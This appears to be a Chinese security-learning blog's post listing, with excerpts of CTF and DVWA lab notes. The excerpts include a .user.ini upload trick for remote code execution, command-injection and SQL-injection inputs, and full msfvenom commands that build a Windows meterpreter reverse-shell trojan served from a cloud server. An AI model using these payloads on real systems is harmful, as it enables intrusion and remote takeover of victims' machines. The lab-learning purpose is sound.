- 博客(11)
- 收藏
- 关注
原创 ctfshow文件包含
宗旨是php伪协议和data伪协议,遇到过滤可以用base64,url编码绕过。修改参数:User Agent :<?POST传参即可RCE。
2023-08-11 18:22:07
105
1
原创 ctfshow 文件上传
创建文件.user.ini.png,内容是auto_append_file="1.png"上传该png,抓包,改包(.user.ini.png改成.user.ini),send。放包,上传成功,访问/upload/index.php,POST传参即可RCE。条件:对应目录下面有可执行的php文件,如index.php。auto_prepend_file在木马文件上传前上传。auto_append_file在木马文件上传后上传。上传一句话木马1.png,抓包,send。
2023-08-11 17:54:04
130
1
原创 kali配置docker及搭建vulfocus环境
账号密码都是admin,进入镜像管理,一键同步。更新依赖库(下东西下不了的时候就更新一下)拉取vulfocus镜像。访问本机ip网页即可。
2023-07-06 20:59:00
298
1
原创 msf远控木马之部署在云服务器
msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe。// 登录postgresql数据库,首次登录没有密码。// 修改数据库用户postgres的密码。set LPORT 服务器监听端口。// 切换到postgres用户。// 安装postgresql。// 获取MSF安装脚本。// 设置payload。
2023-07-03 22:44:22
339
1
原创 dvwa-命令执行
利用命令执行漏洞,输入127.0.0.1 & whoami可执行whoami。impossible方法是将ip地址,去除\,划分成四块分别判断是不是数字。输入127.0.0.1自动执行ping 127.0.0.1。||仅在前面失败后面执行,&&仅在前面成功后面执行。都是无论前面成不成功都会执行后一句。防御方法是将这些字符过滤掉(可以将他们替换成空格)
2023-07-03 13:57:24
87
1
原创 dvwa-sql注入
代码审计:SELECT first_name, last_name FROM users WHERE user_id = '$id'输入:1' union select user(),database()#输入1' and 1=2# 没有反应。发现查到3时报错了,说明只有两列。输入1' and 1=1#
2023-07-03 12:03:15
167
1
原创 msf远控木马笔记
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.255.129(此处为kali的ip地址) lport=9997 -f exe -o demo2.exe(生成一个木马exe)set payload windows/x64/meterpreter/reverse_tcp //设置payload。use exploit/multi/handler //使用这个模块。msfconsole //打开msf控制台。
2023-07-03 08:45:19
179
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人